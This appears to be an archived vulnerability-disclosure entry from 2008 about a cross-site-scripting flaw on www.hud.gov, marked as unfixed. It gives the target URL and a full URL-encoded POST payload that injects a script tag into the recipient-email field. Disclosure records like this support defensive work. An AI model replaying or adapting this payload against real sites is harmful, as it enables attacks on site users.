Security researcher mox, has submitted on 06/03/2008 a cross-site-scripting (XSS) vulnerability affecting www.hud.gov, which at the time of submission ranked 20157 on the web according to Alexa. 
We manually validated and published a mirror of this vulnerability on 07/03/2008. It is currently unfixed. 
If you believe that this security issue has been corrected, please send us an e-mail. | 
 
              | Date submitted: 06/03/2008 | 
Date published: 07/03/2008 | 
Fixed? Mail us! | Status:   UNFIXED |  
 
| Author: mox | 
Domain: www.hud.gov | 
Category: XSS | 
Pagerank: 20157 | 
 
 
 
| URL: http://www.hud.gov/utilities/send/sendlink.cfm | 
 
 
| POST: recipientemail=%3C%2Fblockquote%3E%3Cscript%3E+alert%28%27mox%27%29%3B%3C%2Fscript%3E&recipientemail _required=Please+type+an+e-mail+address+for+at+least+one+recipient&senderemail=%22%3F%3E&comments=&s enderemail_required=Please+verify+that+the+sender%27s+%28your%29+e-mail+address+is+correct&pagetosen d=http%3A%2F%2Fwww.hud.gov%2Frenting%2Findex.cfm&mailpage=Send | 
 
| 
Click here to view the mirror
 | 
 
| 
 | 
 
 
         
 |